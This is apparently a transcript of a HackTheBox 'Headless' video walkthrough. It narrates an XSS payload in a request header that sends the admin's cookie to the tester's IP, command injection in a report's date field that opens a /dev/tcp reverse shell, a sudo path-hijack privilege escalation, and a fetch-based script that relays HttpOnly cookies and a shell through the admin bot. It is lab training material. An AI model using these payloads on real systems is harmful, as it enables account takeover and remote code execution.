What's going on YouTube? This is Ipsec. We're doing Headless from HackTheBox, which is a relatively simple machine. It starts out with a cross-site scripting attack in a contact form. In order to trigger it though, you have to use cross-site scripting in the message to trigger a hacking attempt message. And then that page sends all the headers of the request over to an administrator review. So you can just put a cross-site scripting payload in one of your headers, such as the user agent cookie, or even make up your own header and steal the administrator's cookie. Now, this website doesn't use HTTP only, so your payload doesn't have to be that complex. But at the end of the video, we're going to make a bit more complex cross-site scripting payload because we can actually steal the HTTP only cookie because it's being reflected back into the page. Now, once you get access to the administrator account, there's a basic command injection in the generate report feature. And then once you get a shell, it's exploiting a bash script that you can execute with sudo. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, -v enumerate versions, -vv double verbose. This gives us the TTL and things like that. OA, I'll put all formats, put in the nmap directory and call it headless, and then the IP address of 10.10.11.8. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian server. We also have nmap not detecting the service correctly here because it's just on a non-standard port, or maybe it's standard nowadays. It's port 5000. And looking at the banner, we can see this is easily an HTTP request because, well, we have the HTTP headers, and then we have some HTML. The server is workzug, which is going to be Python, so we know this is a Python web server, and it's setting the cookie that says is admin, and then giving us two strings, and this just looks like it is base64 URL encoded. So the first thing I want to do real quick is just take a look at the strings. I'm going to do an echo on this, and then let's just pipe it to base64-d, and we see that says user. So is admin user, so probably not. I'm guessing it can be either user, guest, or admin, things like that. It's odd that that's not group. When it says like is admin, I kind of expect true or false, but let's check out the second one. So I'm going to do base64-d here, and we just get invalid input. I normally like piping it to a tool called ENT to measure the entropy. I just installed this through apt, and if it's above 3, I generally think it's going to be some type of random data. It's not true random. It should really be like 6 to 8 for true random, but this doesn't look like text to me, saying an entropy of close to 4. So I'm going to guess this is some type of signature, right? So this way it prevents us from being able to tamper with what the cookie sets. It sets a string here and then signs it. One thing I do want to check is, does the time affect the signature at all? So let's go make a request to 10.10.11.8 port 5000. And I probably should have sent this to Burp Suite. So let's click that, send it, make sure I'm on intercept. I'm going to refresh it, and then I'm going to send it over to repeater. And oddly enough, I guess every request on slash is setting this cookie because we see my cookie is set and it's setting it here. Let's see if I remove this. The cookie is not changing at all. So we know time is not a factor of the cookie, which generally is pretty bad because there's no session management. If a cookie got compromised, there's no way to revoke it. Like there's no logout functionality because it's just a static string. So that's how the cookie works. We don't know what the cookie protects yet though, because one is admin and then we get this page. Maybe the page is different if you are an admin, but there could be other pages here. So I always like doing a go buster just to enumerate the web server. So we'll do go buster, DIR, word list, ops, sec list, discovery, is it web next? And then raft small words dot text, and then the URL, and we'll say out file of root.gobuster, I guess. There we go. So while that runs, let's go just take a look at the website. It says, welcome to the website. For questions, click here. And I'm going to turn intercept off so we can click around. First name, we'll do ipsec root at ipsec.rocks, then 555.123.123.4, and a message of hello world. Let's just see what happens here. It just goes away. If we look at the HTTP history, we do this post. It doesn't show too much. So what I want to do is, if I click back, will it give me all my data? It does. Sweet. Let's just do like an image source is equal to HTTP 10.10.14.8 port 8000 slash image. And let's just see if the server makes a request over to us. And we also have a dashboard page. So we can say nc lvnp 8000. I guess I could have stood up a Python web server, but this also gives me all the headers and things like that. So I do like that. And as soon as we do it, we get a hacking attempt detected message. And it displays our HTTP request back to us, and nothing actually happened here. So there's two things we can test for. We can either go dig into this message and because we control all these headers, right? So we can try putting HTML here, or we can play with dashboard. I'm going to play with dashboard really quick, and then we're going to go over to the other one. So let's just do a get on /dashboard. And we get unauthorized. If I don't set the cookie, we get unauthorized still. I'm going to not set the signature, internal server error. Is that the same thing? No. So I'm just testing what if we don't sign it? And then we still get that. We could try echo-n admin like this, base64. Let's see, URL encoding doesn't have any padding, so we can just copy this string, paste that, and this still doesn't work. So we don't have any way to exploit this cookie off of quick testing. So let's go back over to our request, and I'll just actually use the back arrow. So let's intercept this. So I'm going to go to proxy intercept on. I'm going to send this. And then we're going to do the standard thing of putting JavaScript in the user agent. So, or we'll just do HTML actually. Normally when I test for cross-site scripting, I test HTML characters first. We'll just do the U for underline, testing XSS. I know this is just HTML injection, but bear with me. So I'm going to forward this request. And then we see the user agent does have testing XSS underlined. So it is not doing any filtering here. We can just inject HTML most likely. And if anyone is checking this report, because it says it has been sent to the administrator for investigation, and this page is the same as it is here, we can control the web browser of the admin. So let's try this. First, I'm just going to stand up a web server again. Actually, let's just do lvn kp. What the K is going to do is keep it open when a request comes. So we can kill this Go Buster. We curl localhost 8000, and then I close that, I can do it again, right? So all that K does is keep open. I like doing this just again because I get all the headers. So let's go back to HTTP history where we sent this post. Go ahead and send it over to repeater. And instead of doing it in the user agent, I'm going to do it in, let's do it a cookie. So we can say XSS is equal to, let's say script source HTTP 10.10.14.8 port 8000 /pwn.js. Let's try this. Okay. I'm going to send the request. And then we wait, let's say we'll wait 1 minute to see if anything comes into a web server. So what we did here is we put cross-site scripting where this cookie is. So if anyone views it, hopefully they come back to us. And then the next step will be seeing if we can just extract the cookies off the web browser. If we can't, then I probably will use JavaScript's fetch in order to fetch some pages on the server, maybe fetch the dashboard and see what it shows. Also, actually on the end of the video, we'll do this. Because we have a hacking attempt, this message here, if the cookie was set with HTTP only, which means we can't exfil it the way we're about to, we could make the web browser hit this page and then send this page back to us. And since it's giving us the whole header information, we'll get the cookie that way. This is another way, like I've done this a lot with PHP info pages, chaining cross-site scripting. So you have cross-site scripting, you can't exfil the cookie, but the server also hosts a PHP info. So you make the browser hit the PHP info page and then send that information back to you because it has a lot of good information like cookies. And there we go. We have a connection from 10.10.11.8 getting /pwn.js. And yeah, the referral is localhost. So if we wanted to do this method of stealing the cookie that way, we have to keep in mind they're not going to 10.10.11.8, they're going to localhost. And that's important because if you go to 10.10.11.8, it would have a different set of cookies because that's how web browsers store cookies based upon the domain. But that's a lot of talk for probably the end of this video. Let's just go ahead and steal the cookie here. So what we're going to do is actually, we might just do this over HTTP server. Let's make dir dub and then python 3-m http.server. Okay, and now let's go back over to Burp Suite. And in this XSS cookie, I'm going to take off the script source. We could leave it and just host pwn.js, but we can also just do this all here. I'm going to use a fetch command and fetch HTTP 10.10.14.8 port 8000 /?, and let's do a plus document.cookie. So I'm going to send this, and I guess what we probably should have done is intercepted and sent it so we could steal our own cookie to make sure everything's working, because there could be things that we don't, there can't because we can see it here. But the server could have things like content security policy and things like that that would block our cross-site scripting attempt from working. It doesn't, so I'm assuming this will work as long as we didn't make a typo, which I'm noticing I did. This is why we should always be testing our script first, right? This semicolon could also be a bad character that we have to URL encode. Maybe doing it in the cookie is not a good idea because semicolons are used to separate cookies, right? So we don't know exactly how it's being displayed. And again, the reason why I'm doing it in a cookie and not a user agent is because user agents are generally logged, so cookies generally are not logged, at least as well. We could even make our own header if we wanted to, because it's displaying the whole thing. I'm going to go click back real quick. We probably have intercept mode on. So we'll do proxy, turn that off, turn it on, submit, send. Oh, I didn't even need to send it. I just want to copy this cookie line, send this cookie, because I want my browser to actually hit this. Looks like I don't. We got the hit here, right? But this is what I would do if I was troubleshooting it, because we have access to the page that the admin is hitting. I would send this, and then we get this. I see XSS is hidden. I bet if I viewed the source, I did Control U there. And that goes again to intercept mode. Let's see. IP has been logged. Why is cookie not showing up? I wonder if I think when I did Control U, it's not actually sending all the post data. But I would look at this. I can do it through this tab as well, right? This will show me the active page without doing view source. So we go here. We can see it did indeed hit this. If I did not get a hit from my browser, I would go over to the console and see if there's any JavaScript errors here, because that's possible. So let's go now grab this. I just want to make sure this is admin, because I could have just stole my own cookie. I've done that 100 times before. Echo-n. Okay, yeah, it is admin. So let's set our cookie to this and then hit dashboard. So I'm going to go here. Let's go to storage is admin, set that. And then we can send a request to dashboard. Intercept is off, unauthorized. Maybe I didn't copy it. INVV, IMF. So we definitely did not copy correctly. There we go. Refresh, and we get a page. So this is the administrator dashboard. We can generate a report. If I click this, It just says system is up and running. I'm going to change the date. And we're not really getting that much. Let's just intercept this request and see what's happening. So we have just a page. It says date. If I send this to repeater, it doesn't do all that much. What I'm going to do is just basic test. So if I put a bad character here, let's see, 2203, 2203. So even an invalid date is not changing the output of this page at all. I'm going to do a semicolon, let's sleep 1, just in case it's going to like an os.exec. The page should now take a second to run if that is indeed the case. It looks like it is. We can do sleep 2, and it looks like we're just getting lucky right here finding this command injection. But that's why you always test with like sleeps and things like that. You could also ping yourself. So I'm going to do a --c --i dev tcp 10.10.14.8 9001. And I'm going to send this over to myself. Let's do nclvnp 9001, send it. And I screwed up my shell. I did not do the 0 and 1 like that. Is that how I do it? URL encode. Send. I think I got those backwards. Wow. Direct. I may just attempt the whole reverse shell out again because when I screw up, it's all muscle memory. But there we go. So let's see. Python 3-c import pty, pty.spawn, bin bash. Okay. st2i raw minus echo foreground, enter, enter. And we can export term to X term so we can clear the screen. Awesome. Normally when I land on a web server, the first thing I go for is some type of secret such as a database password. However, there's no real functionality here that would indicate a database is even being used. And it's interesting that I guess the web user has write access to this because that is from my failed reverse shell, I believe, the just 1 being there. But since there's no database being used, we can confirm that also with like an SS to see if MySQL port is listening. It is not. We have Gecko driver is listening, which is interesting. This is probably going to be part of Firefox. And I want to say, because we can see the PID, you can see the PID of everything. Let's see. Let's do psef grep on Firefox to see who is running it. The DVIR user is running it. So I'm not even going to worry about attacking the Gecko driver or Firefox itself because the user that's running it is us. So let's go take a look if we have any sudo rules. We do. It looks like we can run Syscheck. I wonder if Syscheck is being used in the web app, if that's like how the date is generated. It doesn't look like it. So let's just see what this file is. Let's do a file against it first. It is a bash script, so let's do a cat. I wonder if I can vim it. V. No, that does not look good. I was hoping to get syntax highlighting. I guess the easiest way to get syntax highlighting would be copy and paste it to my box. My terminal size is wrong, so that was a bit of a pain. But let's do vim syscheck.sh, paste, wrong paste. There we go. So now we have syntax highlighting. So let's look through this. If the effective UID is not 0, then we're going to exit. So if we're not root, then exit. We're going to get the last modified time of VM-linez. And let's see. Okay. Formatted time. So we get the last time the kernel was modified. Disk space. You may think like this is user input because in bash, like arguments, this is how I specify arg1, arg2, arg3. But it is in single quote, so it is terminated. And this is also how you specify the field in awk. So this isn't taking user input, so we can't just do the same thing we did with the dashboard and put a shell there. So there's no user input there. There's nothing really to attack. And then if pgrep initdb database service is not running, then start it. So it looks like we have a way to just run commands. So we can create this initdb script. And since there is no cd beforehand, it's going to run initdb from whatever directory we are at. The first thing I'm curious about, what is initdb? Is this even a thing on the box? Let's do a find / -name. Let's see, initdb.sh. And then we'll hide error messages. And we don't need to know like the script in order to exploit it. We just said there wasn't a database, and it looks like there's a database script. So I wanted to check that out. Nothing too interesting there. I'm just going to go to dev shm. Let's touch initdb. I'm going to make it executable. Initdb.sh. And then let's create a script. So we'll just do bin bash, and then we'll just say bash. So now if I just do, what is it, sudo user bin syscheck, this should get us over to root. Database service is not running, starting it. And it's not giving us the full shell. I think that's just the bash profile that's on this box. But we can see we can run commands. I can do cd root, and we can get root.txt that way. So that is going to be the box. However, that's not the end of the video. We always like going a little bit beyond. And this whole cookie that we had, let's see. The whole cookie, when we stole it, let's go back over into storage. The HTTP only is set to false. Now, in most applications, it's going to be set to true. And if that's the case, then the whole like writing document.cookie isn't going to work, because that's just what that protection's there for, right? So we can still exploit it because the way it's reflecting all the data. So if we go back to that hacking detected message, where is it? Proxy, let's turn it off. Back. There we go. Because it's reflecting the entire HTTP header, we can have a JavaScript request, force the browser to hit this page, and then send this page over to us, and then we'd get the cookie. We could also have them hit dashboard and send the reverse shell. So let's do that. Let's just play with some cross-site scripting for a little bit, because this video is a bit quick and I want to play with cross-site scripting, right? So let's make a pwn.js, and I'm going to start off by writing a async function of post data, and we post the URL and the data we want, right? So this is going to be a wrapper around fetch, and I forget what video it is. Let's see. I bet I can remember if I see the name. Bookworm. This is going to be a very similar payload to Bookworm. And the reason why I'm doing async functions is because I hate how a lot of other people do it with like a fetch then, and then you do another then, and then a then. It's like no and then, right? So I just do with async function. It's easier for me to read and understand the code that way. So let's see. Let's see. Async function post data fetch JavaScript. I need a refresher on exactly how this works because I don't have JavaScript memorized. Proper way to make this. Let's go to Stack Overflow, get device async. Okay, this looks right. So what I want to do is say a const response is equal to fetch. We'll fetch the URL. And then we have to write pretty much the headers, right? We're going to say it's a method of post because this is the post data function. We're going to say we don't want any cross-origin request. The credentials include means we're going to use the existing cookies our user has. And we want to say headers. We're going to make the content type is going to be application x form URL encoded. What we're doing is essentially taking this request, or not this one. We're building this request out, right? And that was the content type. I don't think we need any other headers. I always like disabling the cache. And I think that's all we do. Oh, we have to send the body, of course. Body is going to be data. And then we can exit this request and say constant result. You should probably check it. Like you could probably do a try up here and then wrap errors and do it all properly that way. But we're hackers. We don't do this proper. Await response. I could do blob or text. We'll do text. Return result. And that should be my post data function. So now let's create another async function called pwn. And what we want to do is say const location is equal to window location host name. What I'm doing is grabbing localhost, right? And the whole thing, remember, let's see, do we have it here still? I don't think I have it. But the referral was HTTP localhost, so we knew they were using localhost to access the website and not 10.10.11.8, I want to say. I'm just dynamically pulling it from the browser this way. So this way I'm not depending on knowing how the other end of the request is accessing it. Other than the port. I don't know if I can pull the port through JavaScript. I'm sure if I asked ChatGPT, I could figure that out quickly, but that looks fine for now. We have to now make the payload. And we don't actually have to send the cross-site scripting here. We just have to send this message, so we trigger the hacking detected message. But we don't actually have to make them hit us, right? Because all we want to do is have them hit this page. We don't need to put embedded JavaScript here for them to send us the cookie, because we just want them to send us this information, right? So const payload, that's fine. I wonder if I need to rename location, because that's just highlighted. Let's do constant page is equal to await post data. And then we can say HTTP location /support, like that. I do this in backticks. I don't know why. It just fixes the bash highlighting. I think if I did single quotes, it would still put location as a variable. Not positive by that though. So we can do that. And I actually don't need to get the result of this because this is sending us the data, right? Oh no, we're getting page. And now we just need to say post data. So we don't need to actually get the results of when we make a request to our web server. We'll say post data, HTTP 10.10.14.8. We'll just send it to 8001. And we will send the page. Okay. So what we're doing here is we're going to grab the window name. So this is going to be the domain. We're going to build the payload. So this is going to trigger the hacking detected message. Then we're going to have the browser make a request to support. So we trigger the hacking detected message and we assign that to page. And then we send this back over to us. So let's see if this works. Python 3 -m HTTP server. I probably have a web server up already. I do. Which window is that in? It's probably here. This should be fine. So let's test this out. I'm going to click back. That should be fine. We can turn Prep Suite is off. That's awesome. We sent that. Let's see. Our browser didn't do anything. Oh, this one we actually have to. We have to include the header because we have to pull our JavaScript, of course. So let's say script source is equal to HTTP 10.10.14.8 8000 pwn.js. That should be fine. forward the request. So this is our browser making the request over to support. And then we didn't do anything with that. Let's see. Console. Response.text is not a function. Response.text. Is it just that? Did I call it response also? Response. I'm going to try that. Let's go back. Submit. Script source is equal to, I should have not got rid of my clipboard. Just send to repeater. So we send the post, and this is sending it. So this is the post request. Where is this sending to? 10, 10, 11, 8. Did it work? That should have sent me the cookie. I was not listening, but I didn't see it in Burp Suite, so I'm not positive. Let's grab this cookie, go back to proxy, paste that, send. So we're making the request. I'm going to intercept the response. Okay, we sent it. I'm not sure exactly. We don't have any data here. We screwed something up massively. Because I don't see anything. What did we screw up? Let's see. We get the page. I don't know if we actually made a request over to /support. Location 5000. Let's see. Proxy settings. Content type. Let's edit this. Does not match. So Burp isn't showing us JavaScript. I like removing that rule when doing cross-site scripting things like this. So now let's go through this. Because I have an error definitely somewhere. Okay, we're going to forward this request. We get pwn.js. So browser gets that. Then we send a post over to support. Our browser doesn't have admin. Where is this admin? This is admin, so we can. So we send a post to support. This is going to get us the hacking detected message. So let's say intercept this response. There we go. Hacking attempt detected. And we have cookie here. But what I notice is my browser sent a request before that finished. So I think we screwed up the awaits. pwn.js. We should have waited. And I'm thinking we didn't await because we saw this request go off. If we go back over into our HTTP history, there's where we get the JavaScript. We're pulling the hacking attempted page, and then this is us sending it back to us. It's confusing because 11.8 is the box and 14.8 is me, but when we send the post, we had no data, which indicates that page is blank. I really think response.text is a function. It is. Well, JSON is. Text should behave the same way, right? That should be valid. I'm going to try this again. Let's go back. I probably should just be pasting this in the console window at this point and be a little bit quicker. There we go. So we get pwn. We're posting to support. We intercept the response to this. We got pwn again. That's odd. We get hacking attempt detected. That is good. So this is the response when we got the post. And then it didn't send anything. And that's because response.text is not a function. There's something subtle in this. And it's probably where response.text is falling. Oh. Duh. This has to be awaited. There we go. So without a wait, it just means it's going to run this and continue to the next line because it's an async function, right? So since I didn't put a wait here, response never finished getting declared. So when we hit down here, it wasn't the object from fetch. That has to be the problem. Oh, that was silly. So now, if we turn intercept on, we send this. Let's go over to repeater. We can send the cookie like this. Get pwn, support, pwn. There we go. Posting to us and all the data. So if I look at this netcat, as soon as I forward this request, we can see my browser sent that admin cookie. We also see 10.10.11 8 hit us, and that one should be the box. So by this logic, now I can just hit this tab, and we should see within a minute a new request come in from 10.10.11.8 pwn.js, and then that Firefox will send us the data. Is that? It is. It's just formatted awfully. At reboot, it runs inspect reports. I was saying how often this runs. Every minute. So hopefully we see a request soon. Let's see. 10.10.14.8 pwn.js. Yes. There we go. So there they go. The box hit us, and we can see, whoops. The host is set to localhost port 5000. And it sent us the cookie. So that is a way we can get the data reflecting the cookie, right? And since we pretty much have everything done already, why don't we just change this pwn? So let's go in www cp pwn to pwn like that. We could easily send a request to dashboard. So if we say payload, let's do, was it any date we want? So 2024-07-14, and then semicolon, bash dash I, bash dash, ooh. Let's do this in backticks, bash dash C. Let me retype this. As I was saying, muscle memory. C. No. --C, --I. There we go. So let's send this payload. I wonder if I have to URL encode this or not. I don't know. But we can now say request this to dashboard. And we don't need this post data. So now this should just magically send us a shell from the cross-site scripting, which would be pretty cool, I think. Right? So let's do nc lvnp 9001. And we can test it from, since we have the admin cookie, we can just test it right away to see what happens. So let's go back to repeater, grab, cookie, paste. Grab this. Paste. There we go. Forward. We get pwn. Post to dashboard. I think we have to URL encode this. I don't think we're going to get a shell. We did not. So let's URL encode. So v pwn.js. And we'll do the lazy way of not using like any function to URL encode, and instead just go grab it out of burp, and then let burp do it and paste it in encoded. There we go. Copy that. Let's send this payload. That looks right. Forgot the semicolon. There we go. So this time, hopefully it all magically works. Intercept on, send this. Okay, repeater, grab the cookie, paste. Sometimes I really hate clipboards. There we go. Make sure we're listening on 9001. We send. Now we're sending the post to dashboard. And it did not get a shell. That is bizarre. Let's see. Oh, we don't have the parameter name. What was that? Do we not have any intercepted? It does not look like it. If you want to see what dashboard looks like, you could also use the JavaScript to force the browser to send you the page of dashboard, right? That's how you would do this. And I think we did that in the bookworm video. Date is equal to. So that's what we need to put here. Payload, date equal. There we go. So now I think all the stars have aligned. There's not many more ways we can screw this up. So this one will work. And I know I probably just jinxed myself by saying that. Forward, yep. Posting to dashboard. And we did not get a shell. Oh, why did I have to say that? Let's see. --c, --I, dev TCP 10.10.14.8, 9001. Why are you not working? Because I said data, not date. Let's see. Date. So hopefully now is the time I can no longer screw up. Intercept on. And this is also why you like testing against yourself before just waiting a minute for the bot to do it. So we send this, date, we are listening. Okay, it works. So now we should be able to coerce the bot into doing it, which should just work, right? It should be every minute. We can just send another request for good measure. Let's see, that's this one. We're getting pwn.js, do this. And in 1 minute, we should see the request come. And there we go. So just from the JavaScript, we can also get a shell. So I hope you guys enjoyed that Beyond Root. Take care, and I will see you all next time.